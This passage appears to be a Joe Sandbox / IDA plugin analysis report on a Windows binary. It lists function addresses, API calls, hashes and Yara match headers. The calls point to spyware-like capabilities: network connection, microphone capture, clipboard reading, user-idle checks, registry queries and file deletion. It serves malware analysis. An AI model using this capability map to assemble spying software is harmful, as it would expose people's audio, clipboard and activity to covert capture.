                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410DAE
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00410DC2
                                                • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00414BC8,6C995E08), ref: 00410DD7
                                                • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00410DE6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410DEF
                                                APIs
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00419830,6C9BB310,004060B0), ref: 0040603E
                                                • DeleteFileW.KERNEL32(00000000), ref: 00406045
                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(004197CC,004137F0), ref: 00406059
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406067
                                                • RemoveDirectoryW.KERNEL32(00000000), ref: 0040606E
                                                Yara matches
                                                Similarity
                                                • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                                • String ID:
                                                • API String ID: 1823182134-0
                                                • Opcode ID: 3397cdc29c566b3531d2a528448e1be8175be17ca98253568386dba195db2a14
                                                • Instruction ID: 8a75d147cbd1fd7954b2d92d06643d0a6b0c30aa724540facd61759a062ecc4e
                                                • Opcode Fuzzy Hash: 3397cdc29c566b3531d2a528448e1be8175be17ca98253568386dba195db2a14
                                                • Instruction Fuzzy Hash: BFE086B2682331ABCE046FA4AC0D9CA376CAE05263300807AF813E31A0CF789E44C75C
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000003), ref: 0040D657
                                                • atoi.MSVCRT(00000000), ref: 0040D65E
                                                • ShowWindow.USER32(00000000), ref: 0040D666
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                                • String ID:
                                                • API String ID: 4290155986-0
                                                • Opcode ID: e7232a7d1907fcb32fe0fa8a415ed6137423bbdee974a988ed8be201f0a4d605
                                                • Instruction ID: 27736a11c1144afb6c44707fde786c671dd5af3150eaaae4ca58e16da3112487
                                                • Opcode Fuzzy Hash: e7232a7d1907fcb32fe0fa8a415ed6137423bbdee974a988ed8be201f0a4d605
                                                • Instruction Fuzzy Hash: 12E0C935A001158BCB05AFB1ED5EAED7724FB50716F10887AE113E20E0DF789A05CB19
                                                APIs
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D62B
                                                • atoi.MSVCRT(00000000), ref: 0040D632
                                                • CloseWindow.USER32(00000000), ref: 0040D63A
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@CloseWindowatoi
                                                • String ID:
                                                • API String ID: 14144500-0
                                                • Opcode ID: 2114117409363cb7e78d10ac3ab9084722833f47b2dbd8b20faa7acfed98e52e
                                                • Instruction ID: a76af5b82299ebda6258fe3f6a6f3d77803a8337d0e4312578fc71cb36422cf8
                                                • Opcode Fuzzy Hash: 2114117409363cb7e78d10ac3ab9084722833f47b2dbd8b20faa7acfed98e52e
                                                • Instruction Fuzzy Hash: 84E059355101159BCB05AFA1ED5D5ED7724FB50716B50887AE112E20E0DF789A05CB58
                                                APIs
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040443D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404446
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040444F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404458
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404461
                                                Yara matches
                                                Similarity
                                                • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                                • String ID:
                                                • API String ID: 1976170855-0
                                                • Opcode ID: 03c545faca985665e0c8ba26c08273c866a097cbcaf35bcbc1d0b21ce57e4c9d
                                                • Instruction ID: 744c3aaffa62b8f2256cac924ed8e72aba2ee04e51500d82d91f53dcfe42f784
                                                • Opcode Fuzzy Hash: 03c545faca985665e0c8ba26c08273c866a097cbcaf35bcbc1d0b21ce57e4c9d
                                                • Instruction Fuzzy Hash: D5E092300006068BC728AF10E9698E97BA0FA11B0630086BAA083424B4DB74AA4ACB48
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?), ref: 0040437B
                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?), ref: 00404388
                                                • _CxxThrowException.MSVCRT(?,00414E88), ref: 00404397
                                                  • Part of subcall function 004127A4: free.MSVCRT ref: 004127A8
                                                Strings
                                                • invalid vector<T> subscript, xrefs: 00404376
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@free
                                                • String ID: invalid vector<T> subscript
                                                • API String ID: 2273067808-3016609489
                                                • Opcode ID: 0b42328fae8077a33961002d12bebb873a1c99fc6605dcd5c90a3402ee653f6f
                                                • Instruction ID: 9081e0b97f3d86b390c45543bc86d2b2cd79dda824f32b6c334bb704bc22525b
                                                • Opcode Fuzzy Hash: 0b42328fae8077a33961002d12bebb873a1c99fc6605dcd5c90a3402ee653f6f
                                                • Instruction Fuzzy Hash: BAE01A3185421FBB8F04FBE1EE46CEEB77CFA20715B104026F514A2090EA75A659CB69
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,004012A3,)A,00419BC8,?,00408551,00000003,00000000), ref: 004012DA
                                                • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(00419BC8,?,?,?,?,?,004012A3,)A,00419BC8,?,00408551,00000003,00000000), ref: 004012E7
                                                • _CxxThrowException.MSVCRT(?,00414E88), ref: 004012F6
                                                  • Part of subcall function 00401305: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,?,?,00401300,?,?,?,?,?,004012A3,)A,00419BC8,?,00408551,00000003,00000000), ref: 00401312
                                                Strings
                                                • invalid vector<T> subscript, xrefs: 004012D5
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$??0?$basic_string@D@std@@$??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionG@1@@G@2@@std@@G@std@@ThrowV?$basic_string@
                                                • String ID: invalid vector<T> subscript
                                                • API String ID: 2940198921-3016609489
                                                • Opcode ID: 49323ef09bc0a592db922291846fb59359dc7f77e4d0353e1e64f42a068a7557
                                                • Instruction ID: d8976807297c62d01572152810665a8d5db05232c0cf254fa88bf72be88a025b
                                                • Opcode Fuzzy Hash: 49323ef09bc0a592db922291846fb59359dc7f77e4d0353e1e64f42a068a7557
                                                • Instruction Fuzzy Hash: F5E0127195021EABDF00FBE1D946DED737CBA107067100066B802B2491EA7856458B6A
                                                APIs
                                                • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F060
                                                • GetProcAddress.KERNEL32(00000000), ref: 0040F067
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetCursorInfo$User32.dll
                                                • API String ID: 1646373207-2714051624
                                                • Opcode ID: 00c0f802b49c2a8e6a9f6ce9733f41d5ca5fdd640df29dd6ecd660fe81da5ccc
                                                • Instruction ID: 8c2af54e6974973217ce2fc124f3aefe2ad0fa30a810d026115205a33ac96366
                                                • Opcode Fuzzy Hash: 00c0f802b49c2a8e6a9f6ce9733f41d5ca5fdd640df29dd6ecd660fe81da5ccc
                                                • Instruction Fuzzy Hash: D4C09BB15C0300B7C7106FA0AC0D9D63E546944787325803AF502911D5DBBA07C0575D
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0041242F
                                                • GetProcAddress.KERNEL32(00000000), ref: 00412436
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetConsoleWindow$kernel32.dll
                                                • API String ID: 2574300362-100875112
                                                • Opcode ID: 2848b05bbf0d105ac815b46be2fe068eeccfffed3874a5221256f0aa874a9e33
                                                • Instruction ID: 656b5861eb12fb975ada1a3577eec1db76f4e2637a3b0ace9dfd4a9094a3eac2
                                                • Opcode Fuzzy Hash: 2848b05bbf0d105ac815b46be2fe068eeccfffed3874a5221256f0aa874a9e33
                                                • Instruction Fuzzy Hash: 88C092B0580300BB8A005FA0FE4DAC43B24A68871FB208036F606E21A8DABC02C19B1E
                                                APIs
                                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00410CBF
                                                • GetProcAddress.KERNEL32(00000000), ref: 00410CC6
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetLastInputInfo$User32.dll
                                                • API String ID: 2574300362-1519888992
                                                • Opcode ID: 788472ad7e9fc500dc71e77681d8766f48d7b3fa82a04b1b4c3325b9c869b2fa
                                                • Instruction ID: d159ac18f343f7fde4e1b487c82bbfb71f31a115f8096194abb0d36129630029
                                                • Opcode Fuzzy Hash: 788472ad7e9fc500dc71e77681d8766f48d7b3fa82a04b1b4c3325b9c869b2fa
                                                • Instruction Fuzzy Hash: 0EC092F15C4300FBD6045FB0AD0DBC83A64AA9874B3218122FA0BE1168EBB881C19B1D
                                                APIs
                                                • CreateFileW.KERNEL32(6C9BB310,40000000,00000000,00000000,00000002,00000080,00000000,004137F0,6C9BB310), ref: 00411934
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00411950
                                                • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00411967
                                                • CloseHandle.KERNEL32(00000000), ref: 00411974
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandlePointerWrite
                                                • String ID:
                                                • API String ID: 3604237281-0
                                                • Opcode ID: 54e626bad9dc498234e029e8a41b20420491624d6dd0ef8c24343bbdc3588faf
                                                • Instruction ID: 20ccb315012f3852ca45e84d2ac00785bb081a4d5b6ce7da124fd9a85787cd1d
                                                • Opcode Fuzzy Hash: 54e626bad9dc498234e029e8a41b20420491624d6dd0ef8c24343bbdc3588faf
                                                • Instruction Fuzzy Hash: 121184B1514119BFDF108F949C99EEF7B6CEF06364F108126FA21A22A0C3758F80DB68
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00402817
                                                  • Part of subcall function 00401FC3: socket.WS2_32(00000000,00000001,00000006), ref: 00401FDA
                                                  • Part of subcall function 00402022: connect.WS2_32(00419D80,00419D84,00000010), ref: 00402038
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402850
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402863
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00402899,00000001,00000073), ref: 0040288E
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                                • String ID:
                                                • API String ID: 182292213-0
                                                • Opcode ID: 17ed0322c0e1e7ea1fff0cb00368a6ffbcdae5775f810179b19fef1d942b7dcc
                                                • Instruction ID: 9cd21683212efc4aa8640c2a6815c2dda1cd8d6ad557ecdc1423125fdbafe0b4
                                                • Opcode Fuzzy Hash: 17ed0322c0e1e7ea1fff0cb00368a6ffbcdae5775f810179b19fef1d942b7dcc
                                                • Instruction Fuzzy Hash: 6901F53670020467DB04BF75DD5DAEE3B59DB45741F00C53AFA069B2D1CAB99A048399
                                                APIs
                                                • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,00401465,00000000), ref: 00401498
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,00401465,00000000), ref: 004014B0
                                                • waveInPrepareHeader.WINMM(020F1298,00000020,?,?,00401465,00000000), ref: 00401508
                                                • waveInAddBuffer.WINMM(?,00000020,?,?,00401465,00000000), ref: 0040151E
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                                • String ID:
                                                • API String ID: 1952094867-0
                                                • Opcode ID: 26c6a36dd7bbb63933669df2c2b8bba8791c050adbd666b5a3399c72024d0a02
                                                • Instruction ID: f17f4ceaa08dfeeeee09c7c5df7380e211e29170c5ae5cc7640f9480da3aabed
                                                • Opcode Fuzzy Hash: 26c6a36dd7bbb63933669df2c2b8bba8791c050adbd666b5a3399c72024d0a02
                                                • Instruction Fuzzy Hash: F411FE35A00201AFDB559F59EC6C9A67BB6E789354704C47EE80A873A1D731AC81CB4C
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040A8AE
                                                • RegQueryValueExA.ADVAPI32(80000002,?,00000000,00000000,?,00000400), ref: 0040A8CB
                                                • RegCloseKey.ADVAPI32(80000002), ref: 0040A8D4
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?), ref: 0040A8F3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                                • String ID:
                                                • API String ID: 2462357041-0
                                                • Opcode ID: c884979b86058426f5f096c3ef9973eeefe197d8f8595adf70f6e09100c1f719
                                                • Instruction ID: 54ab7706094e25af14277e1d9514c3cbf2968475ca837108f2d9fa6d11a1ab20
                                                • Opcode Fuzzy Hash: c884979b86058426f5f096c3ef9973eeefe197d8f8595adf70f6e09100c1f719
                                                • Instruction Fuzzy Hash: 430108B610024DBFDB11DF50DD84DEB7B7CAB08345F108072FB01A6161D3349E659B69
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040A920
                                                • RegQueryValueExW.ADVAPI32(80000000,00410E9A,00000000,00000000,?,00000400), ref: 0040A93F
                                                • RegCloseKey.ADVAPI32(80000000), ref: 0040A948
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(004137F0,?), ref: 0040A967
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                                • String ID:
                                                • API String ID: 4081865614-0
                                                • Opcode ID: 98ecfca368624ee8de829ecc2d3fdaf87d5e7851d24a333a835950b47d42dbd1
                                                • Instruction ID: 95b0be73f78a16d01168a07f17b39e84a5986b45995bd83b0fb42d7a6040a34d
                                                • Opcode Fuzzy Hash: 98ecfca368624ee8de829ecc2d3fdaf87d5e7851d24a333a835950b47d42dbd1
                                                • Instruction Fuzzy Hash: 0501E4B514020DBFDB11DF50DD45FEA7BB9BB08345F508061BA15A61A0D770AB189B98
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040DEB5
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040DECC
                                                  • Part of subcall function 0040A163: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00419288,?), ref: 0040A1A3
                                                  • Part of subcall function 0040A163: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040A1AD
                                                  • Part of subcall function 0040A163: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040A1C1
                                                  • Part of subcall function 0040A163: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040A1EC,00000000,?,?,?,?,?,?), ref: 0040A1D8
                                                  • Part of subcall function 0040A163: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040A1E1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@
                                                • String ID:
                                                • API String ID: 2535041984-0
                                                • Opcode ID: 3ccef75f041d4d4d0a5691df4d50caaff344adf0730f9f079690a04cfa119231
                                                • Instruction ID: c68130228d9fa56fda123ebc79ea6802f012a8b7dc68e290332186b0a330a496
                                                • Opcode Fuzzy Hash: 3ccef75f041d4d4d0a5691df4d50caaff344adf0730f9f079690a04cfa119231
                                                • Instruction Fuzzy Hash: 3BF054355011158BCB04FBB6EDAA5FE7B24FB51705F0088BEE413A71E2EA794604CB99
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,00408E3E,?,?), ref: 004080F4
                                                  • Part of subcall function 004112FA: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                  • Part of subcall function 004112FA: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                  • Part of subcall function 004112FA: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                  • Part of subcall function 004112FA: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                  • Part of subcall function 004112FA: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00408E3E,?,?), ref: 0040810B
                                                  • Part of subcall function 00408137: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408147
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00408123
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0040812C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                • String ID:
                                                • API String ID: 384503197-0
                                                • Opcode ID: 189da3c6838e0e41593f6e1784496108d7ff58ee8e714e689386fa2d0dce9f54
                                                • Instruction ID: 4e939de40dca9095a448b576e021db2f78c130c1437fa151339f1674c57617bc
                                                • Opcode Fuzzy Hash: 189da3c6838e0e41593f6e1784496108d7ff58ee8e714e689386fa2d0dce9f54
                                                • Instruction Fuzzy Hash: 28F07A7550011EAFCF05EFA4EC49CEE7B78FF08305B008469F916D61A4EB35A659CB58
                                                APIs
                                                • OpenClipboard.USER32(00000000), ref: 00405F2E
                                                • GetClipboardData.USER32(00000001), ref: 00405F3A
                                                • CloseClipboard.USER32 ref: 00405F42
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,00405FAF,?,?,00000000,75920F00,?,?,?,?,?,00404E4B), ref: 00405F5F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                                • String ID:
                                                • API String ID: 1727351239-0
                                                • Opcode ID: d478ae52d3541881166db364492bfd53198689d5dd96aae8b7dab692b99ba0bf
                                                • Instruction ID: 1ffb289fc15c253a8ce4468c475800d7011c80fd9a6238bfdee33d51b899dc74
                                                • Opcode Fuzzy Hash: d478ae52d3541881166db364492bfd53198689d5dd96aae8b7dab692b99ba0bf
                                                • Instruction Fuzzy Hash: 75E0E575604215BBD711AF55DC09FDF7B6CEB44792F008071BA05A6290D778EE448AAC
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,0040846F,00000000), ref: 00402FD7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402FE3
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402FF8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403001
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?c_str@?$basic_string@D@1@@V01@@
                                                • String ID:
                                                • API String ID: 2505548081-0
                                                • Opcode ID: 70bc603018a4d6fb02e188bbb681361e592b60785a331a472954851439aa302a
                                                • Instruction ID: 34a50c9a10af6f66b6a43d66d675860603b544ebab9912ac4283c124e560bdb2
